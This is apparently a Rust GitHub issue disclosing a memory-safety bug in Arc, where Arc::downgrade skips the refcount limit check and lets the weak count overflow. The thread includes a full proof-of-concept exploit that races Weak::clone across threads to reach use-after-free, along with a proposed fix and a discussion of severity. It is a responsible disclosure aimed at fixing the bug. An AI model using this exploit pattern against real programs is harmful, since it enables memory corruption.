rust-lang / rust

Empowering everyone to build reliable and efficient software.
https://www.rust-lang.org
Other
98.62k stars 12.74k forks source link

Overflow in `Arc` #108706

Closed noamtashma closed 1 year ago

noamtashma commented 1 year ago

I discovered a memory safety vulnerability in the standard library's Arc.

Before the rest of the issue, I just want to say thanks in advance to everyone involved for helping to keep rust safe 🦀 :)

Description of the vulnerability:

In Weak::clone, the weak count is incremented using fetch_add, and then it's checked whether the result passed MAX_REFCOUNT. As is documented in Arc::clone's code, this is because if the counter gets too close to overflowing, the overflow might happen before the call to abort completes, breaking Arc's invariants and probably causing UB. Checking if the counter passed MAX_REFCOUNT means that at least 2^15 (in 16-bit platforms) increments to the counter before abort completes are needed for an overflow.

However, in Arc::downgrade, the code increments the weak count, without checking that the counter doesn't pass MAX_REFCOUNT . This allows the counter to get all the way up to usize::MAX - 1. Then, using Weak::clone, we can get a much more favorable race than intended.

Therefore, the attack is as follows:

We use Arc::downgrade to increment the weak count all the way to usize::MAX - 1, then run Weak::clone three times in parallel. The first two will call abort, but the third will result in a weak count of 1, indicating that there are no remaining Weaks (while there actually are). Then we can abuse this broken invariant to cause UB, for example through Arc::get_mut, as long as we manage to do so before either of the two abort calls complete.

Demonstration of the vulnerability:

Note than to run this exploit yourself, if you're running a 64-bit architecture, the exploit won't run in a reasonable length of time. So Arc has to be modified to lower the counter to 32-bits, to demonstrate the vulnerability.

The exploit in code

```rust type Counter = usize; fn exploit() { println!("Started!"); use std::boxed::Box; use std::sync::*; // use crate::sync::atomic::{AtomicBool, Ordering}; let arc = Arc::new(Box::new(7)); // Keep one of the weaks alive let weak = Arc::downgrade(&arc); // The weak count starts at `1`. // Increase to `Counter::MAX - 1`. for i in 0..Counter::MAX - 3 { std::mem::forget(Arc::downgrade(&arc)); if i % 100000000 == 0 { println!("{i} out of {}", Counter::MAX); } } let mutex_arc = std::sync::Mutex::new(Some(arc)); println!("Finished incrementing"); // let start = AtomicBool::new(false); // We run this function three times in parallel, to trigger our vulnerability. let evil = || { let id = std::thread::current().id(); // You can try this if some extra syncronization is wanted, to make all three threads // start at the approximately same time. I didn't end up needing it, so I don't know if it even helps. // loop { // if start.load(Ordering::Relaxed) { // break; // } // } let weak2 = weak.clone(); println!("{id:?}: Managed to clone!"); // Take the `Arc` let arc = mutex_arc.lock().unwrap().take(); let Some(mut arc) = arc else { println!("{id:?}: Error: Arc already taken!"); return; }; println!("{id:?}: Arc taken!"); // This will succeed even though we still have a `Weak` let Some(val) = Arc::get_mut(&mut arc) else { println!("{id:?}: Error: Failed to get unique access :("); return; // Didn't manage to exploit :( }; println!("{id:?}: Succeeded!"); let arc2 = weak2.upgrade().unwrap(); let also_val = &**arc2; // `val` and `also_val` point to the same value. println!("{id:?}: also_val: {also_val}"); **val = 9; println!("{id:?}: also_val: {also_val}"); *val = Box::new(5); // Now `also_val` points to freed memory println!("{id:?}: also_val: {also_val}"); }; std::thread::scope(|s| { let _ = s.spawn(evil); let _ = s.spawn(evil); let _ = s.spawn(evil); // let _ = s.spawn(|| { // start.store(true, Ordering::Relaxed); // }); }); println!("Done.\n\n\n"); } ```

Running on 64-bit architectures

This is how I tested the exploit myself. I modified the `std` so that the counter would only be a `u32`, and ran the exploit as a "test", with this command: ``` > ./x.py --stage 0 test library/alloc --test-args "exploit --nocapture" ``` This is also present [here](https://github.com/noamtashma/rust-arc-safety-bug/tree/Demo).

Fixing:

The fix is very simple. In the Arc::downgrade compare-exchange loop, add a check that if cur > MAX_REFCOUNT, and it's not usize::MAX, panic. Add a comment explaining that not straying too much above MAX_REFCOUNT is a global invariant, and must be enforced in all increment operations.

Severity:

I'm not sure how severe it is, since it depends on a race with abort, and I don't know how to assess winning this race in real code on different platforms.

It should also be noted that in order for this to be exploited, a large amount of Weaks need to be leaked (depending on usize size), without also leaking heap memory (otherwise the program would run out of memory first).

noamtashma commented 1 year ago

I've opened a pull request here

Noratrieb commented 1 year ago

@rustbot assign @noamtashma

rustbot commented 1 year ago

Error: Parsing assign command in comment failed: ...'noamtashma' | error: user should start with @ at >| ' '...

Please file an issue on GitHub at triagebot if there's a problem with this bot, or reach out on #t-infra on Zulip.

workingjubilee commented 1 year ago

I must stress that our 16-bit targets do not support "atomics" indeed, they barely support math on larger types, so the hypothetical ability to exploit this on them is not actually present.

rustbot commented 1 year ago

Error: Parsing assign command in comment failed: ...'noamtashma' | error: user should start with @ at >| ' '...

Please file an issue on GitHub at triagebot if there's a problem with this bot, or reach out on #t-infra on Zulip.

noamtashma commented 1 year ago

(I changed the title because this issue is about an overflow - I don't think there's an underflow issue as well)

workingjubilee commented 1 year ago

There was some discussion about whether I-unsound should be added to this. I have personally declined to add I-unsound because the last time I did so I started a huge debate as it was explained to me, while this does allow a use-after-free, this can only be done during the microseconds the program is being concurrently terminated. While we should still fix this, the broken invariants will be closed over by process death, one way or another. :crab: :hocho:

noamtashma commented 1 year ago

I wanted to add I-unsound, since I think an RCE during that time window can still be a serious vulnerability. (Or, I wonder if it might be possible that, after gaining control of a thread, a hacker could also gain control of the other thread and prevent the abort from actually happening?)

Especially since rust doesn't have much control over the system's abort duration, or any detail for that matter.

IMO the main thing stopping this from being severe is that, to be vulnerable your code must leak a lot of values, without leaking actual heap space. Or that the attacker wouldn't be able to have a lot of close calls to Arc functions in order to win the race. But since being unsound means that "adversarial" safe code can be unsafe, I don't think that's a relevant reason not to tag this as unsoundness.

cuviper commented 1 year ago

"adversarial" safe code can be unsafe,

From the security perspective, I just want to emphasize that "adversarial" should be considered non-literal -- source code is generally considered within the trust boundary, and if that's ever not the case then you need an entire sandboxing solution for both compilation and execution.

m-ou-se commented 1 year ago

I do think it's accurate to classify this as an unsoundness bug, even though it's very low risk. Let's mark it as I-unsound with P-low for now.